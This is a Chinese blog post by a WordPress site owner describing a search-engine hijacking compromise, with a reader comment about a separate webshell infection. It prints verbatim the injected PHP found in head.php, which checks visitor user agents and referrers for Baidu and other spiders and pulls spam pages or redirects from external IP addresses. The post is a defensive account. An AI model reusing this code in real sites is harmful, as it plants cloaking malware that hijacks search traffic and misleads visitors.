最近,本人的这个网站被黑了,哈哈,流量从1000直接被百度K站,后来发现,本网站在搜索引擎里面全是不可描述 的关键字,哈哈,你懂的,那么如何解决这个问题,除了加强防护之外,还得清除代码,实在找不到?直接找个未安装的原版文件全部替换最为简单。经过研究,本次搜索引擎劫持入侵,主要体现在两个方面。

一、网站根目录出现了与众不同的文件

例如本站是通过WordPress制作的,多了一个wp-blog.php文件,我硬是没有检查出来,这个文件也太像WordPress里面自带的文件了。

二、模板文件

我在模板文件的网站下的head.php出现了如下代码

set_time_limit(30);error_reporting(0);defined('url') or define('url',$_SERVER['REQUEST_URI']);defined('ref') or define('ref',$_SERVER['HTTP_REFERER']);defined('ent') or define('ent',$_SERVER['HTTP_USER_AGENT']);defined('site') or define('site','http://155.159.254.150');defined('road') or define('road',"/?road=".$_SERVER['HTTP_HOST'].url."&der=".ent);defined('regs') or define('regs','@Baidu|Sogou|Yisou|Haosou|Spider|So.com|Sm.cn@i');$format=[".xml",".doc",".pdf",".txt",".ppt",".pptx",".xls",".csv",".shtml",".docx",".xlsx"];foreach($format as $k => $v){if(stristr(url,$v)){$bool=TRUE;break;}else{$bool=FALSE;}}defined('area') or define('area',$bool);if(area && preg_match(regs,ref)){echo g1('http://155.159.254.180/sb.html');exit;}if(preg_match(regs,ent)){if(area){echo g1(site.road);exit;}else{echo g1("http://155.159.254.163/u.php");ob_flush();flush();}}function g1($f){$c=array('http'=>array('method'=>"GET"));$g=stream_context_create($c);$h=file_get_contents($f,false,$g);if(!empty($h)){return $h;}}

狗日的,害得我网站被K,一旦百度中来的WAP流量,直接给转向不可描述的网站。如果PC流量就直接给你显示一个CNZZ的统计代码。最无耻的是,他还把代码加密。

再骂一句,狗日的坏人,一天净干坏事。

相关内容推荐

2 thoughts on “本次网站被黑的处理办法

  1. 去年我自己Thinkphp4.3写了个小网站,丢在服务器上没管,因为Thinkphp有漏洞,被黑客传了木马,跨站到博客上,挂了个太阳城的木马,我直接关了网站,把所有文件打包用河马和360扫了一遍,结果发现了wp_cofig文件,webshell密码用md5倒是撞出来了,但是密码没有任何帮助,还是不晓得谁那么缺德。血的教训

发表评论

邮箱地址不会被公开。 必填项已用*标注

蜀icp备15014327